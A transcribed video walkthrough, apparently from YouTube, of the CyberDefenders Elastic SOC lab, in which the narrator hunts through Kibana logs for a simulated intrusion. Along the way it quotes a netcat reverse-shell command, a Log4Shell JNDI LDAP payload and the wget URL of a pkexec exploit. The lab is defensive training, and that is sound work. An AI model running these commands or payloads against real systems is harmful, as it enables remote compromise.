Hello and welcome back to our continuing adventures on the CyberDefenders platform. Today we are going to take a whack at the newest, at least at the time of recording, exercise that they have put out, this Elastic Dash case. I believe this was a CTF that they had hosted in April? Maybe late March, early April, somewhere within that time frame. Jumped in on it when it was like 4 hours left into it. Was able to make it, I think, more than halfway through, and then obviously just ran out of time. I think it was a work day, so I couldn't really stay up. Not if I was going to be expected to, be up at 0600 and go through and get stuff done, ready for the day. So this is a little bit different from the exercises I've covered previously. This is, they give you a VirtualBox OVA, you start it up, and it's basically just a self-contained, basically like a self-contained seam, that basically in a small little section that allows you to basically stand it up and then go through and do the searches. I don't know how many people have gone through and finished this yet, but so effectively the scenario sits around with an attacker was able to trick an employee into downloading a suspicious file and running it. The attacker compromised the system. Along with that, the security team did not update most systems. The attacker was able to pivot to another system and compromise the company. As a SOC analyst, you are assigned to investigate the incident using Elastic as a seam tool and help the team kick out the attacker. With a whole bunch of stuff basically as to how to go through and format the search. So effectively, you want to go through and get started. You want to be a SOC analyst, but obviously you can't afford to go out and buy a license for SolarWinds or stand up a system. Stuff like this would definitely be able to sit there and be of assistance. We want to avoid challenge write-ups. So we have 24 questions in this. I do not know as to whether or not if this is the same set of questions that they had for the CTF. So we're going through and, looks like 92 people have done it already. Well, be within that first 100. So who downloads the malicious file? That's the beautiful thing. I don't have to do transitions because it's all another tab. So this is actually reasonably nice. Much less likely for me to sit there and screw something up and I have to do a follow-up video. But you know what happens. Oh, okay. All that being said, we need to figure out who downloads the malicious file, which has a double extension. So I don't suppose we have, hey look, we got file name as an actual portion. Ooh, wait, we have file extension. That's even better. Why would it be? Or is this not what I'm expecting? Reference service temp state empty. Suppose I should probably take a look and see as to what kind of impact. Oh yeah, this is gonna max everything just about out. I gotta move over to my new system. File that extension empty. Okay, so we definitely don't want that. So file dot extension. Don't suppose we could do, I don't know if we can do an asterisk dot asterisk, or do we have to do this like in double quotes? Oh, did I not? Oh, let's try it without. Guess the other aspect would be 2. I don't know when the data. Well, we shouldn't have to adjust the time frame. Okay, so apparently nothing with it. I was kind of hoping that we'd be able to. Well, I guess the other aspect would be stick search for double extension. Of course, go through and do the CAPTCHA. Probably should go back through and take a look at some of the stuff. Let's see if they've got a multiple extensions. Rule query. All right, well, let's dump that in there and let's see. Apparently not. It does not like the regex. Or it might be a better place to dump it. Of course, I happen to be so stinking tired that I don't really remember what I was even sitting there, or how I was going through and doing any of this. Cripe. Alright, well, let's clear the errors. Let's take a look at the security alerts. I wonder if that's one of the rules we could dump in there to see if it generates something out of. Definitely within the time frame seems to fit given what we see for the trend. So I guess here's the question. Do we have like a rule already put together that might not as much. Okay, well. So what, 188 alerts? Yeah, I should probably be hosting this on a different system and just leaving this to interface with it. Maybe we can dump that in there to see as to whether or not. Okay, so I gave up trying to get the rule popped in there, started to just dig through the security and then alerts section, and happened to come across on, out of 50, I think it was page 2, malware detection alerts, just basically looking through all this, because as you're seeing, you got the account, the workstation, details, but then they've also got apparently a file name. And we're looking for a double extension. And .pdf.exe, I believe, would definitely count towards that. So this is who now? Ahmed. Okay, so let's go back. AHMED. Hooray! Okay, so that puts that together. And then what was the host name he was? That is desktop-q1sl9p2. So we'll just copy and paste. Hooray. 2 out of 24. What was the name of the file? Count underscore details dot pdf dot exe. And sometimes the predefined alerts, especially in this case, do wonders. All right. What is the attacker's IP address? So I guess let's start doing this. Let's start filtering in the host name. Let's start filtering in the user account. And let's see, out of 188, what does this slim down to be? Looks like 50 alerts. That's a lot more manageable than anything else. Oh, no. That's not what I want. I want process name to be who am I? I know who I am. But why do we have a bunch of who am I running before we get this double extension? Who am I slash groups was the first one. What's the subsequent one? Same thing, groups. Wow, we're getting all these 2 DLLs from someplace. So let's see if the alerts break down on something. Wow, I'm just amazed at how bad this is impacting trying to sit there and do a recording at the same time. I mean, the sad thing is I closed out a bunch of extra stuff that typically I just leave running in the background. So it looks like February 2nd, 12:08. Whoa. There we go. We got 11 network sections for analyzing the event. So let's see what was going on the network. So we know that desktop systems 192.168.10.10 it looks like destinations 192.168.1.10 I guess if you weren't paying very close attention, let's see if we're on the mark with that. No. Okay. Another user with high privilege runs the same malicious file. So that would be the account underscore detail .pdf.exe. So we would go back to so then what we really want is what file dot name is account details save. We'll add that filter in, and then we will remove Ahmed. And first we'll remove Ahmed. Of course, I probably should have changed it and said is not Ahmed. Or are you still looking at the particular event in question? I think this is still looking at the particular event in question. So close out of the analyzer. Looks like that account is Cybery. CYBERY. Due to the search. Okay. We're getting a little bit of a tempo here. Attacker was able to upload a DLL file the size of 8,704. What is the file name? I'm assuming this is basically just pivoting off of. So let's take a look and see as to whether or not we can find any Cybery. I guess the other aspect we could try doing too is there a file.size? Oops, oh, that's all just screwed up because it's taking it a second to catch up with me. Oh, there is. File size is 8704. Let's get rid of username Cybery just to see. So we go from 2 alerts then to 2 alerts. When I think it might effectively be staring me directly in the face. Lowercase m. Capital C. I think that might be a DLL. It's just named funny. Yeah, it's a DLL file. mcblhdgwp.dll, and this one was indeed underneath Cyberry again. Yes. Okay. What parent process name spawns command with NT authority privilege and PID? Okay, let's get rid of the file size. Let's get rid of the isolation, just the desktop, because I have no idea as to whether or not. Do we have a simple field name of PID? We do. Process.pid is 10716. Let the background stuff chug along, chug along. Okay, I think 188 alerts was for the whole thing, so I find it hard to believe that it's going to be 188 alerts all have the process ID of being 10716. That's better. We want the parent process that spawns it, right? So run dll32.exe. The previous process was able to access a registry. What was the full path of the registry? Well, we've got the event, so let's plop her up in the event analyzer, and we'll see as to whether or not if we get the section there for here's registry, because we were able to find the stuff underneath network. One for run DLL32. Okay, show me. But I can't see it all. Okay, now I can see it all. HKey local machine or HKLM slash system slash current control set 001 slash control slash LSA slash FIPS algorithm policy slash enabled. It's what? Federal Information Protection System or something like that? A standard that all this stuff's supposed to be against if it's going to be used. I believe in federal government. Federal Information Processing Standard. I think I've seen it mentioned before. Okay, what are we looking for now? PowerShell process with PID 8836 changed a file in the system. What was the file name? So, let's go up. Let's kill the, or close the analyzer. So let's change process to edit filter. And this is supposed to be 8836. Yes, yes, 8836. Did I not hit save? I must not have. Really? Hmm. What if we said parent process PID is 8836 and just get rid of process PID? Because anything direct with 8836 does not exist. So let's see, nada. Or maybe it's something that the rules just didn't pick up on. That is entirely possible. I might have to go back to back to the old dashboard, the starting spot, and see. Whoa. Okay. Just take me back home. If you're gonna go through and do this yourself, I would highly suggest boning up on anything you can find in regards to Kibana search, Elastic, things of that nature. Okay, we've got all this stuff in here. So, search field names. We want the PID. Dr. Pip. Man, I haven't had Dr. Pip in I don't know how long. So let's try adding in a filter. Okay, process PID 8836. And then we are looking for refresh because it's been a little bit. PowerShell process. Changed a file on the system. So it's like if we blow this out, endpoint. How about, is there the process name PowerShell? I mean, this should just be kind of redundant because it should already be in there. And then we're looking for it having screwed with a file. So I'm going to assume that's going to be something underneath the aspect of like event. Event action. What kind of different sections do we have? Modification. Change and modify should be the same exact section. So let this shake out from there. All right, so we've got 4. Yes, 4 hits of PowerShell going through, and getting their dirty hands on everything. So let's see what we got. Although I wouldn't figure that it would be a registry. Registry, yeah, I don't want. Then maybe modified is not what we're looking for. Event.cat, because we're looking for modification of a file. So, well, okay, there is file. And then we can take a look from there and take a look at the event.actions to see what that shakes out. 11 hits, that's not bad. But if we take a look at event action, what do we have here? Deletion, creation, overwrite. Hmm. Oh, supposedly a change. So what? File extension PS1, PSM, PSM1, PS1. I guess overwrite would be maybe module analysis cache. It's kind of the closest thing that I'm seeing because, okay, I wouldn't say created is the same thing as changed. Overwritten, I suppose, at this particular point. Okay, I guess in their eyes, overwritten is the same thing as changed. Although I guess technically, if you did have a file that was with the same exact name and you entirely overwrote its contents or majority of it, then I suppose that would, I guess, count. Okay. PowerShell process with PID 11676 created files with the PS1 extension. What is the first file that has been created? All right, so we're going to change PID or process PID to 676. Update. Hopefully we get something. Oh, okay, 14 results. I can kind of get behind that. And we're looking for the very first file. Well, didn't I have a section in here for these that it actually denoted like PS1 and PSM1? Yeah, file extension. Okay, so let's do this then. File dot. Actually, probably would be better to do add this as the filter process PID because we know what we're effectively stuck with or what we have to have because it's specified 11676 and then we will basically just play around in the search. So what was that? File dot extension colon PS1 6. Okay, and how are they sorted? Looks like the one at the bottom is the newest. Creation, okay. And they want what? The file name, right? Where file header. File name underscore underscore PSS. So PS script policy test underscore BYMX or WXUFT dot 3B5 dot PS1. Yes, okay, so and the format hint underscore underscore. Okay, yeah, we're definitely on a roll now. Coming up on halfway point. What is the machine's IP address that is in the same LAN as the Windows machine? Well, we know that that desktop was 192.168.10.10. So, what would we? Is there a, or is it source? Okay, let's do this. Just put in IP. Host.ip. Actually, if you dump it in there and filter, it's odd. It's 100% there. It's like, yeah, I don't really care about the colon colon 1 for the local host for IPv6. Hmm. Let's go back to the alerts section to see what shakes out here. Excuse me. Okay, I'm gonna sit there, do like with everything else. I'm gonna pause, give it some time to populate. We'll come back. Okay, juggle it down to take a look at the source IPs. So there is the 192.168.10.10 or the desktop-Q1SL9P2 that we found in the first section of questions. And we're looking for stuff that's on the same portion. And right underneath it, I happen to see 192.168.10.30. Same LAN as the Windows machine. Okay. And we're coming up to the halfway point. The attacker log into the Ubuntu machine after a brute force attack. What was the username that was successfully logged in with? So we need to find what? Hostname Ubuntu? Try to figure out the time frame for like a bunch of failed logins and then basically just kind of zoom in on that. It's going to be my guess. All right. I suppose nothing that shows up there, of course. How about hosts? Because I assume that the host name is going to be Ubuntu. Okay, apparently the host name is going to be Ubuntu. Apparently we have a CentOS box as well. This takes us to authentications. Okay, we're kind of looking for that. So 520 fails, 94 successes. Sixty-four successful logins for Cyberry, 11 for Salem, 18 failures for Salem. But wow, 10.10 just so our Windows machine just kind of beat the ever-living crap out of all this. So it's either, well, last successful source, so I'm assuming root was local then. Last failed source. So local. I think it's going to be Salem. Salem. Yeah, the formatting helps. Okay. Uh, so after the attacker, downloaded the exploit from a GitHub repo using wget. What was the full URL? Okay, so I'm assuming then that we're looking at that the username is going to be Salem, the host is going to be Ubuntu, and then we're looking for some sort of mention of wget. So let's go back home. I suppose I could take a look at the alerts to see as to whether or not it's wget. Well, Maybe. So I'm thinking that what we're gonna do is hostname Ubuntu, username Salem, and then just a thing for wget. Yeah, I get it. Don't show me again. I don't care. Host.hostname. Okay, so let's do this. Host.hostname is Ubuntu. So damn near 250,000 results. That cuts it down to 127. And then what is it for the user dot name? Colon Salem. Well, it's either going to be user.name or user.id. So let's see if we see a decrease from round up 128K in results. Apparently not so much. And then what if we just add the term wget? Hmm. Oh, is that it right on top? Well, that would be interesting. Wget CVE 2021 4034/main exploit.c. We want this reversed. Oh, so what was that? I thought there was a process name. Well, there's a parent name. Process dot name. It's wget. Because I'm not going to sit there and try to sort through 128K of results. Really? Even with all this specified? That seems funky. So you tell me I'm going to come down here, I'm going to take a look at the process name, and it's going to tell me, no, process name on this one is systemd lognd. Or do I got to force a refresh? Okay, I know that there's process args as well. Um, and all the ones were like wget, and then I thought it was um, comma space. Really? Yeah, it's still insisting that it's. All right, fine. Flip it back the other way. All right, so we still got the same aspect for wget, but of course it was just what I was looking at before was just a search for wget, not necessarily that the process name was wget. Yeah, see, now I'm not seeing the what I had before. Okay, fine. We put it back the way it was before. See, now we need to get more in line with this. So it looks like this is so it looks like they're pulling stuff from that. So can we go and adjust this to do process.args and wget. Oh, I already had that taken into account. I mean, you can't tell me that there's been that many. Of course, that's assuming that it actually is going to be something for GitHub user content. And yet nothing changes. Okay. I gotta get ready. Go pick up. Okay, so I'm gonna pause this. I'll come back to it. Okay, a little bit of a change up. So basically, I removed a bunch of file.ext.original.path, the key items that kicked up there, and then specified that process args has to be wget, and we go from 128K rounded up in results to 12. So basically, the whole thought process is, okay, find something for all of the um, events that did not contain the information I wanted. Find something that had those stand out. Although it kind of seems like I could have just as easily just specified in the filter that process.args bwget and still get the same result. We'll test that theory before I start screwing around with that stuff. So we are looking for the first run through. So still the same exact stuff, still on the Ubuntu box, still underneath the Salem account, and still looking for the wget aspect. So the first thing we have here is February 2nd at 11:44:54. And it looks like they reached out to raw.githubusercontent.com/Joe Amond, CVE 2021 4034, main CVE 2021 4034.py. So I'm assuming that they want the address, right? Yeah, by the looks of it. Let's see if we're right. That had to be at least a good 15 minutes of futzing around with the last search to go through and do that. So we need to get we got to get the process called pkexec, and we got to get that process's MD5 hash. Before we do that, though, I want to see if I remove these filter aspects. Did we go back to 128K in results? No? Do we actually stick at 12? Cold brew. Good stuff. Good stuff. So it looks like effectively I just wasted time with those filters. Yeah, I don't know everything. But apparently enough of the stuff came together to get 12 results and for us to get the answer from that. So I think we're going to be on the same portion. So we need to change the process name from wget to pkexec. 2 hits. Okay. uh, so let's see if we can find something mentioned in here for. Do we get that? Ooh, we get the process hash. They wanted MD5, right? Yeah. Ooh, ouch. Process hash. Well, we had 2 entries, so let's see if we get another one that doesn't match with that one. Hmm. So what if it is just the aspect? What if it's not run underneath Salem? What if it's spawned by like system or root or something else to that effect? We might have narrowed it down too much. Because I would almost think from this particular portion that the parent process would be. Wouldn't the parent process be Python? Because it's a PY file, so it's a Python script. And nothing changes. Oh, process args, wget. Whoops. That filter's kind of what's screwing you there. Ugh. At least I'm assuming that would be it. We'll wait for the refresh. Cripe. Put Salem back in. See if that helps at all. And then I guess let's take a look for what the parent.process.name would be. See what options we have there. Yeah, not much has changed there. Bash. Oh, let's just try removing bash and see what shakes out of there. It's like this thing moves a lot faster if I'm not doing or running OBS and capturing it, but obviously I kind of need to have all that go together if I'm going to make a video in regards to this. I may or may not be getting a little impatient. Oh, that didn't make a big impact. Oh, let's try it. Process.parent.name Python. Wow, that didn't really do jack crap. Group ext real name. Yeah, it's kind of the thing I don't recall seeing for that very first event. We get the process name, but where's the fact that the username is? Yeah, username shouldn't be root. All right, gonna pause again. Okay, changed it over from Lucene over to KQL, and then started actually making use of the and or operators. So just changed out. I had done host.name : Ubuntu and user.name : Salem and process.name : pkexec. Got 0 results. Knocked out the name, get 21 results. And they all apparently now finally have the same hash, according to this at least. So let's get it expanded out, and we'll try that. Parent process bash -i. But 3A, 4, okay, let's dump that in there. Woohoo! We got 10 left. Attacker gets an interactive shell running the process. The process ID. Is this the... just because it was there on the thing? Nice. Oh. we gotta figure out. So basically, I'm pulling that one just from down here. Process.parent command line bash space dash I from that first alert that expanded outwards. Okay, and so now we need to go take a look at alerts. I wonder if we could just sit there and do like netcat as a search term and see what we get. Net and cat. Nothing. Bugger. well, we got it in parentheses, so what if we try just parentheses? The whole thing. Of course it wouldn't be that easy. Of course. Of course. But this is what process.name is NC for netcat. Four hits. So we need to figure out what now? What is the host name? CentOS. Sweet. Although you probably would be able to dig down in the alerts section to find that. I just happen to remember, for basic testing stuff like that, that NC is the command on Linux systems to basically kick that off. What's the username of who ran netcat? It's what, user.name? Solar? That's an interesting name. What is the parent process name of netcat? Okay. Java? Wow, just this one search is like a freaking gold mine for all this stuff. Yeah? Oh, it's the ebb and flow of you get frustrated and results. You get frustrated and the results go down. All of a sudden, it just immediately reverses. If you focus on the NC process, can you get the entire command that the attacker ran to get a reverse shell? Maybe. Oh. nc-e/bin/bash 192.168.1.10 comes back to the 1.10, like what we'd have seen when we started off looking at the desktop or Windows desktop, port 9999. From the previous question, you may remember a famous Java vulnerability. What is it? I mean, the only thing I can think of for Java is like log for shell, but I don't know. Yeah, because it was, what, December 2021 when that kicked off? It was our quote unquote Christmas gift. But then should we not see? Because it should be something that, well, what was the typical format for? I mean, they kind of give it away. Yeah, JDNI. So it should fit some sort of format like this. What is the entire file path of the SolR application? Var SolR logs. See, I don't think it's all that, but apparently it is. I don't think it's going to be underscore GC. I think it's just going to be SolR from. Okay. I'm not going to argue with it. Oh, God. What is the path that is vulnerable to log4j? Hmm. What is the get request parameter used to deliver the log for? So I'm guessing all this is going to come back into play in terms of if we need to see about trying to actually access that log, see what fits in there. So if we just pop in double quote slash var slash solr slash logs, I don't suppose like we get like a breakdown and be able to take a look to see as to what it records. Maybe. I was kind of hoping that maybe it would have been posted in there. What if we're looking at this the wrong way? Host.name. This was the CentOS box, and user.name is Solar. And then maybe I can sit there and try to do a search for like the beginning of the JDNI. See if I can't break it down further from that. This is just not updated yet. Oh, doesn't look like it. Oh, there we go. So basically, I'm just looking for something to stand out from all this. And I am not having a good go of it. We're getting that aspect where results are going down and frustration is beginning to climb. But it is what it is. Whoa, what happened here? Okay, there we go. All right, so I'm gonna go through and do a pause. Keep looking through this because we're in the final stretch. I might have to go back and refresh myself with log4j because it's been a little bit of time. We put in terms of dealing with it, it was put the detections in, start cracking the whip to get patches applied, and then it was kind of out of mind. The fire is over. But okay, so I'll pick back up here hopefully shortly. Okay, I don't know as to whether or not if I'm gonna hit this one, but I went underneath the alerts and then logs and then stream. And for a second there, while waiting for this stuff to go through, I could have swore I ended up seeing what looked like the log4j, the exploit, log4shell, whatever. Right there, right there, right there, right there. So let's see as to whether or not how this works. Okay, so it looks like wait, no. No, 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 no. I'm not seeing the mark in there. Ay, crap. And I have no idea what that content would end up being. Well, I mean, the blogs for elastic.co was, I think, mentioned. So let's see as to whether or not if we got any good stuff in here that'll make it easier to search. http://request.headers. Sure, why not? Not really getting anywhere else. Request dot. Is that not? Remove the stuff, have it refresh. All right, let's take a look at the alerts then. Search Java. No, not a damn thing. Wait, the time's wrong on this. From now. Let's try fully reloading it. We'll see what we get. Yeah, I seem to have lost the ability to go through and search the time frame somewhere in here. Only 16 hits for Java. I mean, I'm not going to sit there and complain about that. Java-version. Bash opt sol r bin sol r start. So that seems to be some sort of application. From this username is still sol r. But I am not seeing like the actual contents of whatever would be written in. Oh. What's up, little bud? Dogs joined us. Again, another one with Java. Dash version. This looks like basically it starting up some application. Because we've got all those different aspects dumped in here. Effectively, it's just dumping everything. Did this come back up? Last 15 minutes. Let's use the time and day range that was previously specified. And then we should get they were open alerts. I'll just take it back home and try to come back to it and see what we can get. gonna hop up? You wanna be on camera? Hmm? You wanna hop up and be on camera? There you are. See? Say hello, YouTube. Oh, you're a good girl. Yeah. All right. Oh. Running out of those 16 hits. Hey. Yeah, this looks like this is basically the collection of all the information for when that stuff was starting up. Okay, I'm gonna, I think, go through and just go back to the start with this stuff and just do a hard refresh. I'm just noticing just oddities with the time frame as it's specified, just losing it and then not being able to see the options. So I'm gonna let it marinate a little bit and probably go digging around to see what else I can do to sit there and try to find this aspect. So I'll be back. Okay, that took longer than what I wanted. So I completely neglected to take into an account in the upper left-hand corner the indexes. All I was doing is searching through the logs dash asterisk. So on a wild hunch, decided, well, okay, let's just take the typical JNDI colon LDAP string for log for shell and put in quotation marks and run it through, and we'll just try each of the indexes to see as to whether or not if we can get lucky. And apparently we got lucky. Underneath the file beat index, we have back in the /var/sol r/logs /sol r.log, we have a hit. Two of them, in fact, for the path for that. Apparently the path is /admin/course, which I think they ask what path? Admin/course? Oh, beautiful. And then we get the payload in here, which is so foo equals $, curly bracket, JNDI colon LDAP colon //192.168.1.10 colon 1389 /exploit. Apparently they're expecting a double, so throw on an extra double curly quote at the end of that. Submit. No? The hell? I think my AV just stopped the it recognized it for what it was and tried to sit there and stop it. Hang on, let me try. I'm going to try it again to see if it'll send through. Yep. Oh, it just does not like that, but I suppose I should feel vindicated for my choice of AVs, at least on this box. Waiting for it to open up here. Probably going to have to turn off a section in order to actually make this submission. Of course, then the only thing we have left is what is the GET request parameter. Yep, threat attempt blocked. Online threat prevention, which I believe I can turn off for a short period. Maybe? Here, let's just refresh the page. Well, we're close. Close to being done. Oh, so close. Nope, it just fired it off again. Okay, I'm just going to turn off all of this. There. So that should be off. Now let's try submitting it again. There we go. Oh. Okay, so we're looking for the GET parameter. Looks like it's 3 characters. Is it foo? Oh, that was a good one. Beautiful. Oh, now that that's done, let's take a look at the write-ups. Oh, there's only one? All right, while this is going on, oh, shut down now. There we go. I'm closing the VM. Oh, yeah, I got block out of that so everything kind of picks back up. File name. File.name : asterisk dot asterisk dot asterisk using KQL apparently works. Yeah, I suppose, considering the fact that, okay, so it is a wild card. Oh. Well, when I'm not recording, I might go through and check all this stuff, but the end result is I got a full score. Oh. No, this was very, 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 very nice. So, yeah, that has been the Elastic Case exercise on the CyberDefenders platform. And we're just shy of 2 hours. Good. Actual time spent was closer to 5 or 6, but you want to get everything done in a day and just keep banging your head against stuff. You're gonna do what you're gonna do. But so yeah, freely available. You just need to make sure that you have a strong enough system and VirtualBox. So what I will probably end up doing is trying to get this stuff exported. Um, See about getting this VirtualBox installed on a different machine to host, and then see as to whether or not I'm going to be able to actually have that. It might just be easier just to kind of try to package everything up to migrate to a new machine on OBS and just create the files there and go from there. But so that's all done. But I mean, you just can't recommend it enough, especially if you're looking to sit there and take the role of a SOC analyst, so you can sit there and actually play around with the events that are in there. At least since Elastic is, free, at least in this particular case here. You've got the case and the questions, everything else like that. It's a really good exercise to go through and do. But so with all that being said, I'm not going to continue to ramble on, and I will see everybody in the next video. Hopefully. Fingers crossed.